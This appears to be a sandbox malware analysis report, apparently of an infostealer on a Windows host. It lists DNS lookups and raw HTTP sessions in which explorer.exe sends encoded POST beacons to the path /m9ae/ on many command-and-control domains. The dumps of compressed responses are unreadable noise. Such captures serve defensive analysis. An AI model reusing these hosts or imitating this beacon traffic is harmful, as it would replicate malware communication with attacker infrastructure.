                                                                                                                        Nov 29, 2022 10:35:32.116449118 CET8.8.8.8192.168.2.50x2c4aNo error (0)pp.3105.net93.179.126.57A (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:35:32.116449118 CET8.8.8.8192.168.2.50x2c4aNo error (0)pp.3105.net93.179.126.25A (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:35:42.635181904 CET8.8.8.8192.168.2.50x57e8No error (0)www.porggiret.site198.54.121.81A (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:35:52.783279896 CET8.8.8.8192.168.2.50x9426No error (0)www.tobewell.storetobewell.storeCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:35:52.783279896 CET8.8.8.8192.168.2.50x9426No error (0)tobewell.store178.208.83.20A (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:36:02.056188107 CET8.8.8.8192.168.2.50xbe35No error (0)www.new-thinking.digital62.233.121.61A (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:36:12.027338028 CET8.8.8.8192.168.2.50x2b64No error (0)www.ybkos.link107.148.15.81A (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:36:23.798295975 CET8.8.8.8192.168.2.50x906eNo error (0)www.bookmygennie.com38.163.214.169A (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:36:23.905383110 CET8.8.8.8192.168.2.50x906eNo error (0)www.bookmygennie.com38.163.214.169A (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:36:33.618837118 CET8.8.8.8192.168.2.50x92e2No error (0)www.amspustaka.comamspustaka.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:36:33.618837118 CET8.8.8.8192.168.2.50x92e2No error (0)amspustaka.com23.111.12.177A (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:36:43.399647951 CET8.8.8.8192.168.2.50x5112No error (0)www.spirituallyzen.com74.208.236.214A (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:36:53.005125046 CET8.8.8.8192.168.2.50x10fdName error (3)www.davidemarone.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:36:54.035623074 CET8.8.8.8192.168.2.50xdf56Name error (3)www.davidemarone.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:36:55.074374914 CET8.8.8.8192.168.2.50xa18fName error (3)www.davidemarone.comnonenoneA (IP address)IN (0x0001)false

                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • www.oonrreward.xyz
                                                                                                                        • www.gmrsnodes.com
                                                                                                                        • www.dailyheraldresearch.com
                                                                                                                        • www.publickit.website
                                                                                                                        • www.lee-perez.com
                                                                                                                        • www.frwqc.com
                                                                                                                        • www.tommy57.shop
                                                                                                                        • www.700544.com
                                                                                                                        • www.porggiret.site
                                                                                                                        • www.tobewell.store
                                                                                                                        • www.new-thinking.digital
                                                                                                                        • www.ybkos.link
                                                                                                                        • www.bookmygennie.com
                                                                                                                        • www.amspustaka.com
                                                                                                                        • www.spirituallyzen.com

                                                                                                                        HTTP Packets

                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        0192.168.2.549711188.114.97.380C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:34:27.138349056 CET186OUTGET /m9ae/?F6z4=LevhYPqdwsQo7WECD6x58K9v32wKr9jEH/unqFqLIkFUX6m7L7+nio4XOLlDaWup3nHmZdjhK28JVchKAobJnM2R7Dp3tDlOSA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1
                                                                                                                        Host: www.oonrreward.xyz
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 29, 2022 10:34:27.527229071 CET187INHTTP/1.1 302 Found
                                                                                                                        Date: Tue, 29 Nov 2022 09:34:27 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        X-Powered-By: PHP/7.1.33-50+ubuntu22.04.1+deb.sury.org+2
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Access-Control-Allow-Origin: http://www.oonrreward.xyz
                                                                                                                        Location: http://oonrreward.xyz/m9ae/?F6z4=LevhYPqdwsQo7WECD6x58K9v32wKr9jEH/unqFqLIkFUX6m7L7+nio4XOLlDaWup3nHmZdjhK28JVchKAobJnM2R7Dp3tDlOSA==&mN6Hg=kRq8Chx0sXs4Nnu0
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RShkW0WIvZDtXutYqEkut9sx1UexKj9I5cneADfYD3KG3N9sEB6CNCqIpwKzyvdqfktKRTc2qJu17oVwkxHjWKk9TD4bHCEl2G7ouCHCSHu1VP4QeLRkM4TIoRBQQ5UAHbCRbn4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 771a58fbaf599a17-FRA
                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        1192.168.2.549713192.185.90.10580C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:34:33.073966026 CET196OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.gmrsnodes.com
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 410
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.gmrsnodes.com
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.gmrsnodes.com/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 72 79 74 59 37 68 71 32 6b 38 49 32 45 58 35 31 74 73 44 36 7e 30 75 53 52 72 4c 79 7a 30 54 75 34 6d 46 4c 76 76 77 49 7e 78 6b 7a 68 45 64 65 4a 70 4a 66 6d 36 65 52 64 30 33 53 68 47 65 6c 31 45 66 54 33 76 6a 38 45 72 46 7a 42 30 53 55 32 6e 65 33 38 51 4c 57 6f 56 49 4b 7e 46 4e 73 35 58 51 78 4a 5f 6e 66 7e 63 75 52 28 4e 63 54 4a 2d 54 4f 7a 47 4b 44 58 64 73 2d 54 39 72 4a 67 64 76 33 4b 7a 72 51 58 72 50 69 5a 32 7e 64 73 42 33 54 69 5a 36 58 4d 42 50 6f 64 4a 4d 39 59 79 77 31 36 48 77 71 6c 6b 4e 32 58 48 6a 6f 68 79 72 76 33 4e 62 61 6e 50 48 68 65 42 6b 72 46 7a 70 53 6a 51 49 78 57 42 43 76 53 30 4d 6d 78 6f 41 77 48 41 32 47 4a 72 54 70 76 70 4b 51 58 44 72 54 67 30 58 56 33 6b 37 58 6f 6b 50 69 43 73 48 6b 54 73 6b 4d 6f 49 38 36 61 59 72 54 32 61 31 73 6a 54 61 65 4a 52 47 6b 4d 6d 76 31 51 58 6d 62 52 67 64 62 62 61 65 55 6b 74 6c 58 30 61 66 64 38 6e 53 57 5a 6d 77 55 47 6d 51 33 6c 41 48 4a 57 37 7a 72 64 4c 37 47 61 43 4f 71 71 5f 5a 44 31 70 6d 70 37 5f 73 63 61 66 50 39 66 5a 38 47 59 4e 35 48 48 48 47 36 56 62 61 2d 77 71 78 53 30 47 55 66 66 31 64 48 37 76 4c 35 70 68 33 78 6c 4a 53 4c 5a 4d 34 4a 5a 75 33 38 69 37 4e 69 6c 36 70 67 48 39 46 6e 30 35 33 33 63 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=rytY7hq2k8I2EX51tsD6~0uSRrLyz0Tu4mFLvvwI~xkzhEdeJpJfm6eRd03ShGel1EfT3vj8ErFzB0SU2ne38QLWoVIK~FNs5XQxJ_nf~cuR(NcTJ-TOzGKDXds-T9rJgdv3KzrQXrPiZ2~dsB3TiZ6XMBPodJM9Yyw16HwqlkN2XHjohyrv3NbanPHheBkrFzpSjQIxWBCvS0MmxoAwHA2GJrTpvpKQXDrTg0XV3k7XokPiCsHkTskMoI86aYrT2a1sjTaeJRGkMmv1QXmbRgdbbaeUktlX0afd8nSWZmwUGmQ3lAHJW7zrdL7GaCOqq_ZD1pmp7_scafP9fZ8GYN5HHHG6Vba-wqxS0GUff1dH7vL5ph3xlJSLZM4JZu38i7Nil6pgH9Fn0533cQ).
                                                                                                                        Nov 29, 2022 10:34:33.208233118 CET197INHTTP/1.1 404 Not Found
                                                                                                                        Date: Tue, 29 Nov 2022 09:34:33 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2,h2c
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Sun, 02 Oct 2022 12:42:28 GMT
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        Content-Encoding: gzip
                                                                                                                        Content-Length: 4677
                                                                                                                        Content-Type: text/html
                                                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66 04 25 61 db 90 ef 66 51 6d 42 3c ff 71 d3 a2 7f 4d 5a 71 d4 a1 ce ba 30 26 a4 d2 ef d3 56 1c ef 82 80 96 ab 6b 14 93 95 8e 49 26 3b f9 fa 41 83 05 ea 7d 2a 6d a5 44 33 d4 a4 71 b1 99 49 63 79 2b 21 45 66 c8 7d ce 7e f9 e5 e0 60 b1 69 91 ef a6 ab dd a3 c9 f3 17 2f 7e 5d ec ba 42 9a b5 cd c3 17 bf 26 87
                                                                                                                        Data Ascii: RmssgJ&av$NmRmHInM=_cpw~y3(\G(z}[832qQtjEl0;hQoAqK/^zPP`1PP%J^Vyg::<s}k9=v]Ivs8w>;]Np3xyvGe)e,v&FVIJqM3Hhp8(a{8jotEI.6q^>YZQH]rBis_4:Jar!c(j):{{d!5Dh4+k5yUD$wZ}YQO,5I>i6<]2XpCMe^Wh2.|~l'|v,sTWdG'8RFOE>8.V?\~[KJzp=4LB)YyuFMYb;Cd5[&TWRd{/_lyoY'+G;G\?zJL9*~"P,EO$}(OW<2X!SSQrxOx"#DJMAP!3-uH26?<gR;1<]9G$Vp0sBQ=f%afQmB<qMZq0&VkI&;A}*mD3qIcy+!Ef}~`i/~]B&
                                                                                                                        Nov 29, 2022 10:34:33.208273888 CET199INData Raw: 2f 56 43 53 84 7b 98 88 e4 2e 37 54 eb b4 bf 38 87 cf fd bf 11 0b 31 29 f2 c2 cf d5 1c 2c 29 99 f2 56 8a 87 e9 e1 08 2a 91 a6 52 e7 43 78 ce 7b 6b 7f 5f d6 68 0b 54 ea fe 21 64 6e 44 33 da c1 62 a2 78 69 04 dd db ac 90 0e bf 1a 78 1c 05 b3 c7 cb
                                                                                                                        Data Ascii: /VCS{.7T81),)V*RCx{k_hT!dnD3bxixqTHr2=-c/7UtoGc-'9_e$'(e66FANz=86CG]__^g^v/o[[iG^6|h7+*(Dk3Aa0;
                                                                                                                        Nov 29, 2022 10:34:33.208291054 CET200INData Raw: c9 54 67 1a 30 2b f3 7c c0 9d 7f 7e 40 28 27 a3 a2 c2 c4 c1 7f 48 9c c1 95 9f 7b a1 33 da 0f 6a 73 72 14 8e bf c3 54 0a b8 15 93 4d 85 8f e2 89 a2 e4 ee 73 4d dc 93 44 09 6b 3d bb 14 7b e3 c2 b9 6a 18 2d da 1c 9a 9d e4 b2 6f 1b 1b 85 7c 6d 34 61
                                                                                                                        Data Ascii: Tg0+|~@('H{3jsrTMsMDk={j-o|m4aG+.<W6CYkGm^jTRm=9tMj=;74O'y'*22m=3}J'5Ks]lT:_0Y26F8InG.6_dzUZq4"s5R4=(f'{c8
                                                                                                                        Nov 29, 2022 10:34:33.208312035 CET201INData Raw: fb f0 37 a2 52 89 70 e5 1d 57 4f fb 7e a6 e9 fa a0 ae 62 ab 21 d6 2f 10 97 72 01 9f 08 bd 14 f9 40 e3 85 f3 fd ae 88 fb cd ed 6c 9d f6 05 2d 45 03 1a db 0a fb ea 6c 0d 09 c9 f1 51 4b be d9 24 b5 db 67 c9 06 a6 de f8 da b2 59 c2 7a 4b 6f 0b 46 b7
                                                                                                                        Data Ascii: 7RpWO~b!/r@l-ElQK$gYzKoFfKl]DX>+5Oj<u.K!t[EVdpiJ<8)3~(9szG|o(X\v#S3fuHpi"S)*f.Tr#'


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        10192.168.2.549723216.40.34.4180C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:35:02.217142105 CET246OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.lee-perez.com
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 410
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.lee-perez.com
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.lee-perez.com/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 71 4c 6a 6a 75 73 45 30 7e 37 65 34 50 36 65 65 44 33 46 49 6e 79 75 70 47 4b 38 65 57 45 37 78 4a 64 63 68 67 4a 49 57 51 2d 43 56 43 50 67 54 4c 78 4b 4e 70 75 69 75 66 35 7a 7a 30 49 52 4c 79 68 5a 53 51 4d 61 32 38 64 73 59 33 73 69 6e 4a 65 76 4e 73 55 78 33 74 77 62 39 7a 4a 4a 4e 46 74 62 72 37 79 57 35 68 6e 72 5f 45 61 58 64 53 69 4e 75 53 51 42 7a 62 56 54 46 4f 6d 56 67 67 58 66 51 41 79 48 6d 7a 2d 28 67 68 4f 4e 53 36 39 44 4c 61 6e 45 65 42 65 56 76 30 78 4f 4f 32 74 41 31 64 75 57 42 38 4e 31 63 74 32 63 4a 6b 6d 41 44 50 79 50 71 70 52 66 45 4e 5f 53 56 42 49 56 34 6d 50 38 55 38 6b 4f 38 52 45 77 58 69 6c 65 6b 76 6f 32 66 41 34 6a 45 6c 41 6f 36 66 76 4a 50 34 4e 4d 31 61 35 32 47 4c 44 63 4a 38 48 58 59 55 4f 68 44 6d 4c 70 6e 47 56 53 39 38 49 48 54 4f 4a 47 4b 6a 74 31 70 74 37 74 6f 58 6a 73 52 63 4e 4d 64 48 54 6f 68 37 50 6f 72 4d 48 36 4f 67 37 6b 4d 4d 78 4d 34 72 5a 73 6a 61 78 72 61 4a 2d 4e 69 59 6c 69 4a 70 67 61 56 6d 5a 50 78 49 67 61 54 4e 63 77 58 70 7a 33 52 72 37 63 6c 38 53 6b 44 77 38 73 70 39 66 66 52 35 44 53 6b 44 69 30 75 37 4d 63 64 71 4f 44 79 38 4a 67 4f 72 6e 52 71 47 75 54 31 69 63 42 58 78 68 49 4b 78 2d 4e 6a 47 31 45 55 51 78 48 38 66 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=qLjjusE0~7e4P6eeD3FInyupGK8eWE7xJdchgJIWQ-CVCPgTLxKNpuiuf5zz0IRLyhZSQMa28dsY3sinJevNsUx3twb9zJJNFtbr7yW5hnr_EaXdSiNuSQBzbVTFOmVggXfQAyHmz-(ghONS69DLanEeBeVv0xOO2tA1duWB8N1ct2cJkmADPyPqpRfEN_SVBIV4mP8U8kO8REwXilekvo2fA4jElAo6fvJP4NM1a52GLDcJ8HXYUOhDmLpnGVS98IHTOJGKjt1pt7toXjsRcNMdHToh7PorMH6Og7kMMxM4rZsjaxraJ-NiYliJpgaVmZPxIgaTNcwXpz3Rr7cl8SkDw8sp9ffR5DSkDi0u7McdqODy8JgOrnRqGuT1icBXxhIKx-NjG1EUQxH8fg).
                                                                                                                        Nov 29, 2022 10:35:02.388256073 CET247INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.14.2
                                                                                                                        Date: Tue, 29 Nov 2022 09:35:02 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        X-Request-Id: 80efbcd2-9125-405a-a05b-a8e27ff167db
                                                                                                                        X-Runtime: 0.057525
                                                                                                                        Content-Encoding: gzip
                                                                                                                        Data Raw: 31 34 31 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 3c eb 73 da c6 b7 df f3 57 ec 0f cf 2d b8 35 e2 e1 37 01 77 08 e0 57 6d 70 31 71 92 66 32 54 a0 05 14 0b 49 91 84 31 ee ed fd db ef 39 67 77 a5 15 18 c7 b5 7b 3f dc 99 c4 d3 44 96 76 cf fb b5 bb 67 5b fd 4f b3 d3 e8 7d ba 6a b1 49 34 75 8e de 54 f1 1f e6 98 ee b8 96 e1 6e 06 5f 70 d3 3a 7a c3 58 75 ca 23 93 0d 27 66 10 f2 a8 96 99 45 a3 fc 41 86 15 e8 53 64 47 0e 3f aa 0f 23 db 73 59 c3 73 a3 c0 73 1c 1e 54 58 eb 7e c8 7d 7a 3b 34 67 e3 49 54 2d 88 a1 38 29 8c 16 30 09 9e 18 1b 78 d6 82 fd 45 8f f0 8b 39 bc 1d 07 de cc b5 f2 43 cf f1 00 ca c6 71 1d 7f de ca 01 ea ed f6 f6 b6 7a 35 35 83 b1 ed 56 58 d1 bf 17 af fe 7e 13 03 de 62 fe 16 f3 9c 2d 36 83 ff 22 2b c6 33 02 3a f3 23 73 6a 3b 8b 0a 9b 70 e7 8e 47 f6 d0 dc 62 77 3c b0 4c 17 1e cc c0 36 61 4a 68 ba 61 3e e4 81 3d 52 d8 68 66 68 3f f0 0a 90 5b da 56 38 19 73 6c 97 e7 27 dc 06 4e 2b ac 74 b0 44 8c 1f f0 34 72 01 a2 54 4a 00 cc 27 76 c4 f3 a1 6f 0e 01 36 8c cf cf 03 d3 4f 71 04 2f 8d 81 77 9f 48 cb 0b 2c 94 34 00 61 a1 e7 d8 16 db 68 b5 5a 8a 52 df b4 2c db 1d c3 e7 58 32 8c ad 08 8b b1 b9 6d 45 93 0a 3b dc 5d a6 19 b5 cf 83 18 5b ac 90 e2 31 fc 28 2c 89 c6 40 57 8d dd f2 71 79 67 85 80 a2 b1 cb a7 ac 84 7f a7 f8 99 94 62 e0 31 5d 46 19 86 c6 d0 d3 42 35 4a 0a 00 63 9a 1e 60 46 1a 6c 79 85 e6 34 61 29 a8 e5 dd 25 55 19 16 18 bb ed 84 4f 89 b9 59 c4 9f 58 06 a4 87 7c 60 5a f6 2c ac b0 9d 44 a7 8a 2d 20 3c b1 4f c6 2c 3b f4 1d 13 4c 6f e0 78 c3 5b 05 46 29 62 7f 59 11 46 38 9b 02 a4 c4 4d 62 d5 c2 48 56 8a 19 40 67 22 4a 06 5e 14 79 d3 94 61 a4 29 7e 8c 00 e9 36 31 fb ba c9 2a 3e 56 50 55 98 eb b9 3c 25 fe 8d 21 b8 88 09 de 90 98 0e 18 2d fa 0c 59 63 4c a2 f4 d6 d8 00 4b c5 e2 7f ad 9a ce 23 66 63 84 de 2c 18 72 f6 f3 aa f5 24 92 8f 45 b4 1c 16 d4 ec bf 54 c8 59 75 a2 e6 21 fe c4 da 8d 63 12 58 78 ab 81 3f cf d0 98 20 51 97 61 ca 1f 75 6b 10 12 79 44 92 8a 54 c3 32 21 fc 2a 82 35 cb 3f 48 24 e6 41 e8 1a 39 de bc c2 cc 59 e4 ad d2 9e c4 d3 e3 e3 94 ba 0c db 1d 79 31 f0 44 6c 2b de 9a a6 c6 40 27 ea bb b3 e9 80 07 9a ab ac c6 ef b4 c4 54 10 a9 d7 e3 90 9e c8 05 9c 24 c1 1a 1b 73 20 43 6a 12 e4 9a cd a6 62 30 e2 f7 51 de 74 ec 31 24 00 1a 98 e6 0d 89 5c e6 2d ef f0 11 86 68 2d 2a 2e 87 de 55 20 95 09 0a 38 09 09 ab 7c 1e ef e1 cf ea 4c c3 84 d4 78 97 50 f1 58 8a 3b 6e c0 9f f4 d4 89 6d 59 dc 8d 11 c6 0e bb e2 6e 60 18 4c 49 f5 f0 a0 78 58 dc 7d cb fe 26 db 36 2b 77 76 08 39 05 d2 5e 3c 62 6f 6f 2f fe 6c 44 01 e4 9a fc 28 30 a7 1c 54 f8 e8 18 c5 77 fc 51 46 52 85 22 05 c3 08 b9 c3 87 69 84 62 3c 0c 97 ee b6 01 d9 3d e2 fd c8 1c 38 4a 26 71 ec 17 12 90 01 02 78 72 4c 3f 84 5c a8 9e f0 33 c1 49 c1 88 30 4d b1 48 e9 66 29 02 96 13 ab b1 2c eb 69 08 90 5b 31 6c 4a 99 2f 01 52 72 5f 4f 80 9a 1e 4d 24 84 25 87 17 dc a5 33 9a 8c a7 cf 02 6a bb fe 2c da 08 b9 19 0c 15 86 fc 9c 0f 6e 6d 70 00 df 87 d7 a6 8b 95 03 7a c4 c8 e6 ce 3a 66 a9 de 5a 27 2e ad 92 58 2f 2e 09 a1 e2 46 93 fc 70 62 3b 56 ce b3 ac 4d 25 36 3d 5a 8e ca f8 b3 46 ea 08 c6 e0 f7 e0 1e fd a9 19 0d 27 3c dc
                                                                                                                        Data Ascii: 1415<sW-57wWmp1qf2TI19gw{?Dvg[O}jI4uTn_p:zXu#'fEASdG?#sYssTX~}z;4gIT-8)0xE9Cqz55VX~b-6"+3:#sj;pGbw<L6aJha>=Rhfh?[V8sl'N+tD4rTJ'vo6Oq/wH,4ahZR,X2mE;][1(,@Wqygb1]FB5Jc`Fly4a)%UOYX|`Z,D- <O,;Lox[F)bYF8MbHV@g"J^ya)~61*>VPU<%!-YcLK#fc,r$ETYu!cXx? QaukyDT2!*5?H$A9Yy1Dl+@'T$s Cjb0Qt1$\-h-*.U 8|LxPX;nmYn`LIxX}&6+wv9^<boo/lD(0TwQFR"ib<=8J&qxrL?\3I0MHf),i[1lJ/Rr_OM$%3j,nmpz:fZ'.X/.Fpb;VM%6=ZF'<
                                                                                                                        Nov 29, 2022 10:35:02.388307095 CET248INData Raw: 5a d1 2d 8d 19 cd 1e 1e 16 6a cc 0a 1a 15 d8 2e d0 fb 4f 3c 07 bc a6 eb 59 9f b8 03 c1 30 65 50 2a 29 8a 4a 09 0d e3 da 31 23 7e 12 f0 c5 b3 29 04 c1 3d 8b c8 44 be 9a 38 12 d7 7d be 6d a9 92 35 b6 25 28 2e d8 b6 0c 5d c2 6c 7c 33 9a f4 53 66 21
                                                                                                                        Data Ascii: Z-j.O<Y0eP*)J1#~)=D8}m5%(.]l|3Sf!8;hv'PR,9X56TX>Zp6ndyr8>[Y8 Bb0I{,J&~eY"_fFF8"a]4$nRPqxxqpr&$b\hX
                                                                                                                        Nov 29, 2022 10:35:02.388331890 CET249INData Raw: 71 e8 68 0a a1 ef 2c 60 b0 f5 0d 27 01 b8 f7 22 7a 27 68 3c 7e c8 21 1d 36 1c bb 15 df c2 3f 55 9d 33 c3 81 85 71 34 81 f7 bf fc 92 1c ef 69 ac 7f b6 bf 18 d0 b1 d7 ba 03 a2 2f 24 ba 5c 96 d0 67 b7 92 13 58 9e 4c 66 8c 1b 70 e0 80 13 9a 7c 64 ce
                                                                                                                        Data Ascii: qh,`'"z'h<~!6?U3q4i/$\gXLfp|d('h<z!8:%6Xc35AA_X?R]]/Fns5 2e),$LUYhu&+bj9%Srl]?1n:
                                                                                                                        Nov 29, 2022 10:35:02.388351917 CET251INData Raw: f5 67 2d f4 23 88 2f d9 4d ec 82 95 fa a5 86 64 84 0a bf 6b a5 6c 0a 26 00 14 5e af cf a4 3c 77 2d 7c f0 a9 99 e9 7c a8 a1 a6 54 f7 0c 00 e9 94 a8 0a 76 50 42 57 28 41 35 0d ce 27 d0 71 ef 7a a0 4c 8a 83 77 a6 33 e3 cc 86 a8 05 b6 0a 9a 21 96 c5
                                                                                                                        Data Ascii: g-#/Mdkl&^<w-||TvPBW(A5'qzLw3!7dhXmq&!`=`-th%ffr`(j UiDKUL{DMT=ejOfg!AAmX$2;#Cs!ld7+TSr&f?Fxpnx6x&
                                                                                                                        Nov 29, 2022 10:35:02.388379097 CET251INData Raw: a0 ae 65 c4 f7 3e f4 1b 51 2b 0d 62 78 21 03 90 d3 45 0f 22 5b ce 97 ff 88 7b 42 ff 1e 0f f2 e6 95 46 3f dc af 7a 82 76 75 fb ea 29 ba 4f ea bd d6 87 fa a7 fe 59 bb d7 ea 1e d7 1b ad 8a f4 91 c6 c9 59 01 ee 3d 08 b5 bc 39 85 9d eb 7e bd d1 68 5d
                                                                                                                        Data Ascii: e>Q+bx!E"[{BF?zvu)OYY=9~h]?~N}Fln@a+Qohk~u;Wixb+0Tq^u)#\|wfOzX6JCmE=-9Zz


